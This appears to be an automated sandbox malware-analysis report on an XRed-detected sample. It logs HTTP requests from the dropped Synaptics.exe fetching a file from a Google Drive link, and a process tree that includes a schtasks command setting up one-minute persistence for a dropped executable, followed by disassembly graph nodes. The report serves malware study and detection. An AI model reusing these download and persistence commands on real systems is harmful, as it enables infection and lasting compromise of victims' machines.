                                                                                                              2024-12-30 10:25:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 58 6c 52 74 6b 71 58 74 58 56 49 51 77 66 79 56 6b 72 39 70 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="-XlRtkqXtXVIQwfyVkr9pw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              52192.168.2.849797216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:44 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-8PU9F4DzCg9ScbZ-Id9hkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              53192.168.2.849796216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:44 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bgxifBEU5A9bbkjV2ux7FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:05:25:10
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Machine-PO.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:2'208'256 bytes
                                                                                                              MD5 hash:A6BD561711EA8C2064C20644CCEEE074
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:05:25:11
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\._cache_Machine-PO.exe"
                                                                                                              Imagebase:0x1a0000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 61%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:05:25:11
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                              Imagebase:0x400000
                                                                                                              File size:771'584 bytes
                                                                                                              MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 92%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:4
                                                                                                              Start time:05:25:12
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:53'161'064 bytes
                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:5
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:6
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                                                                                                              Imagebase:0xad0000
                                                                                                              File size:147'456 bytes
                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2753117932.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2754697002.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                              Imagebase:0xc10000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:10
                                                                                                              Start time:05:25:16
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 61%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:05:25:24
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:05:25:32
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:771'584 bytes
                                                                                                              MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:18
                                                                                                              Start time:05:25:35
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996
                                                                                                              Imagebase:0xed0000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:19
                                                                                                              Start time:05:25:41
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:22
                                                                                                              Start time:05:25:49
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:23
                                                                                                              Start time:05:26:01
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:25
                                                                                                              Start time:05:27:00
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:26
                                                                                                              Start time:05:27:16
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\splwow64.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                                              Imagebase:0x7ff616c20000
                                                                                                              File size:163'840 bytes
                                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.4%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:6.2%
                                                                                                                Total number of Nodes:1461
                                                                                                                Total number of Limit Nodes:147
                                                                                                                execution_graph 102605 226a80 102606 226a8c __lseeki64 102605->102606 102642 228b7b GetStartupInfoW 102606->102642 102608 226a91 102644 22a937 GetProcessHeap 102608->102644 102610 226ae9 102611 226af4 102610->102611 102732 226bd0 47 API calls 3 library calls 102610->102732 102645 2287d7 102611->102645 102614 226afa 102615 226b05 __RTC_Initialize 102614->102615 102733 226bd0 47 API calls 3 library calls 102614->102733 102666 22ba66 102615->102666 102618 226b14 102619 226b20 GetCommandLineW 102618->102619 102734 226bd0 47 API calls 3 library calls 102618->102734 102685 233c2d GetEnvironmentStringsW 102619->102685 102622 226b1f 102622->102619 102626 226b45 102698 233a64 102626->102698 102629 226b4b 102630 226b56 102629->102630 102736 221d7b 47 API calls 3 library calls 102629->102736 102712 221db5 102630->102712 102633 226b5e 102634 226b69 __wwincmdln 102633->102634 102737 221d7b 47 API calls 3 library calls 102633->102737 102716 203682 102634->102716 102637 226b7d 102638 226b8c 102637->102638 102729 222011 102637->102729 102738 221da6 47 API calls _doexit 102638->102738 102641 226b91 __lseeki64 102643 228b91 102642->102643 102643->102608 102644->102610 102739 221e5a 30 API calls 2 library calls 102645->102739 102647 2287dc 102740 228ab3 InitializeCriticalSectionAndSpinCount 102647->102740 102649 2287e1 102650 2287e5 102649->102650 102742 228afd TlsAlloc 102649->102742 102741 22884d 50 API calls 2 library calls 102650->102741 102653 2287ea 102653->102614 102654 2287f7 102654->102650 102655 228802 102654->102655 102743 227616 102655->102743 102658 228844 102751 22884d 50 API calls 2 library calls 102658->102751 102661 228823 102661->102658 102663 228829 102661->102663 102662 228849 102662->102614 102750 228724 47 API calls 4 library calls 102663->102750 102665 228831 GetCurrentThreadId 102665->102614 102667 22ba72 __lseeki64 102666->102667 102760 228984 102667->102760 102669 22ba79 102670 227616 __calloc_crt 47 API calls 102669->102670 102671 22ba8a 102670->102671 102672 22baf5 GetStartupInfoW 102671->102672 102673 22ba95 __lseeki64 @_EH4_CallFilterFunc@8 102671->102673 102679 22bb0a 102672->102679 102681 22bc33 102672->102681 102673->102618 102674 22bcf7 102767 22bd0b LeaveCriticalSection _doexit 102674->102767 102676 22bc7c GetStdHandle 102676->102681 102677 227616 __calloc_crt 47 API calls 102677->102679 102678 22bc8e GetFileType 102678->102681 102679->102677 102680 22bb58 102679->102680 102679->102681 102680->102681 102683 22bb8a GetFileType 102680->102683 102684 22bb98 InitializeCriticalSectionAndSpinCount 102680->102684 102681->102674 102681->102676 102681->102678 102682 22bcbb InitializeCriticalSectionAndSpinCount 102681->102682 102682->102681 102683->102680 102683->102684 102684->102680 102686 226b30 102685->102686 102687 233c3e 102685->102687 102692 23382b GetModuleFileNameW 102686->102692 102812 227660 47 API calls std::exception::_Copy_str 102687->102812 102690 233c7a FreeEnvironmentStringsW 102690->102686 102691 233c64 _memmove 102691->102690 102693 23385f _wparse_cmdline 102692->102693 102694 226b3a 102693->102694 102695 233899 102693->102695 102694->102626 102735 221d7b 47 API calls 3 library calls 102694->102735 102813 227660 47 API calls std::exception::_Copy_str 102695->102813 102697 23389f _wparse_cmdline 102697->102694 102699 233a7d __NMSG_WRITE 102698->102699 102703 233a75 102698->102703 102700 227616 __calloc_crt 47 API calls 102699->102700 102708 233aa6 __NMSG_WRITE 102700->102708 102701 233afd 102702 2228ca _free 47 API calls 102701->102702 102702->102703 102703->102629 102704 227616 __calloc_crt 47 API calls 102704->102708 102705 233b22 102706 2228ca _free 47 API calls 102705->102706 102706->102703 102708->102701 102708->102703 102708->102704 102708->102705 102709 233b39 102708->102709 102814 233317 47 API calls ___wstrgtold12_l 102708->102814 102815 227ab0 IsProcessorFeaturePresent 102709->102815 102711 233b45 102711->102629 102713 221dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 102712->102713 102715 221e00 __IsNonwritableInCurrentImage 102713->102715 102838 221b2a 52 API calls __cinit 102713->102838 102715->102633 102717 2723b5 102716->102717 102718 20369c 102716->102718 102719 2036d6 IsThemeActive 102718->102719 102839 222025 102719->102839 102723 203702 102851 2032de SystemParametersInfoW SystemParametersInfoW 102723->102851 102725 20370e 102852 20374e GetCurrentDirectoryW 102725->102852 102728 20373b 102728->102637 104094 221ee2 102729->104094 102731 222020 102731->102638 102732->102611 102733->102615 102734->102622 102738->102641 102739->102647 102740->102649 102741->102653 102742->102654 102745 22761d 102743->102745 102746 22765a 102745->102746 102747 22763b Sleep 102745->102747 102752 233e5a 102745->102752 102746->102658 102749 228b59 TlsSetValue 102746->102749 102748 227652 102747->102748 102748->102745 102748->102746 102749->102661 102750->102665 102751->102662 102753 233e65 102752->102753 102758 233e80 __calloc_impl 102752->102758 102754 233e71 102753->102754 102753->102758 102759 22889e 47 API calls __getptd_noexit 102754->102759 102756 233e90 RtlAllocateHeap 102757 233e76 102756->102757 102756->102758 102757->102745 102758->102756 102758->102757 102759->102757 102761 228995 102760->102761 102762 2289a8 EnterCriticalSection 102760->102762 102768 228a0c 102761->102768 102762->102669 102764 22899b 102764->102762 102792 221d7b 47 API calls 3 library calls 102764->102792 102767->102673 102769 228a18 __lseeki64 102768->102769 102770 228a21 102769->102770 102771 228a39 102769->102771 102793 228e52 47 API calls __NMSG_WRITE 102770->102793 102775 228aa1 __lseeki64 102771->102775 102784 228a37 102771->102784 102774 228a26 102794 228eb2 47 API calls 5 library calls 102774->102794 102775->102764 102776 228a4d 102779 228a63 102776->102779 102780 228a54 102776->102780 102778 228a2d 102795 221d65 102778->102795 102783 228984 __lock 46 API calls 102779->102783 102799 22889e 47 API calls __getptd_noexit 102780->102799 102786 228a6a 102783->102786 102784->102771 102798 227660 47 API calls std::exception::_Copy_str 102784->102798 102785 228a59 102785->102775 102787 228a79 InitializeCriticalSectionAndSpinCount 102786->102787 102788 228a8e 102786->102788 102789 228a94 102787->102789 102800 2228ca 102788->102800 102806 228aaa LeaveCriticalSection _doexit 102789->102806 102793->102774 102794->102778 102807 221d33 GetModuleHandleExW 102795->102807 102798->102776 102799->102785 102801 2228d3 RtlFreeHeap 102800->102801 102802 2228fc _free 102800->102802 102801->102802 102803 2228e8 102801->102803 102802->102789 102811 22889e 47 API calls __getptd_noexit 102803->102811 102805 2228ee GetLastError 102805->102802 102806->102775 102808 221d63 ExitProcess 102807->102808 102809 221d4c GetProcAddress 102807->102809 102809->102808 102810 221d5e 102809->102810 102810->102808 102811->102805 102812->102691 102813->102697 102814->102708 102816 227abb 102815->102816 102821 227945 102816->102821 102820 227ad6 102820->102711 102822 22795f _memset ___raise_securityfailure 102821->102822 102823 22797f IsDebuggerPresent 102822->102823 102829 228e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 102823->102829 102826 227a66 102828 228e27 GetCurrentProcess TerminateProcess 102826->102828 102827 227a43 ___raise_securityfailure 102830 22b4bf 102827->102830 102828->102820 102829->102827 102831 22b4c7 102830->102831 102832 22b4c9 IsProcessorFeaturePresent 102830->102832 102831->102826 102834 234560 102832->102834 102837 23450f 5 API calls ___raise_securityfailure 102834->102837 102836 234643 102836->102826 102837->102836 102838->102715 102840 228984 __lock 47 API calls 102839->102840 102841 222030 102840->102841 102897 228ae8 LeaveCriticalSection 102841->102897 102843 2036fb 102844 22208d 102843->102844 102845 2220b1 102844->102845 102846 222097 102844->102846 102845->102723 102846->102845 102898 22889e 47 API calls __getptd_noexit 102846->102898 102848 2220a1 102899 227aa0 8 API calls ___wstrgtold12_l 102848->102899 102850 2220ac 102850->102723 102851->102725 102900 204257 102852->102900 102854 20377f IsDebuggerPresent 102855 2721b7 MessageBoxA 102854->102855 102856 20378d 102854->102856 102858 2721d0 102855->102858 102856->102858 102859 2037aa 102856->102859 102888 203852 102856->102888 102857 203859 SetCurrentDirectoryW 102862 203716 SystemParametersInfoW 102857->102862 103060 242f5b 48 API calls 102858->103060 102964 203bff 102859->102964 102862->102728 102863 2721e0 102868 2721f6 SetCurrentDirectoryW 102863->102868 102865 2037c8 GetFullPathNameW 102976 2034f3 102865->102976 102868->102862 102869 20380f 102870 203818 102869->102870 103061 23be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 102869->103061 102991 2030a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 102870->102991 102874 272213 102874->102870 102877 272224 GetModuleFileNameW 102874->102877 102876 203822 102879 203837 102876->102879 103058 203598 67 API calls _memset 102876->103058 103062 20caee 102877->103062 102999 20e1f0 102879->102999 102883 272271 103069 2039e8 48 API calls 2 library calls 102883->103069 102884 27224c 103066 2039e8 48 API calls 2 library calls 102884->103066 102888->102857 102889 272257 103067 2039e8 48 API calls 2 library calls 102889->103067 102893 272264 103068 2039e8 48 API calls 2 library calls 102893->103068 102894 2722a5 Mailbox 102894->102888 102896 27226d GetForegroundWindow ShellExecuteW 102896->102894 102897->102843 102898->102848 102899->102850 103070 203c70 102900->103070 102904 204278 GetModuleFileNameW 103087 2034c1 102904->103087 102909 20caee 48 API calls 102910 2042ba 102909->102910 103102 20d380 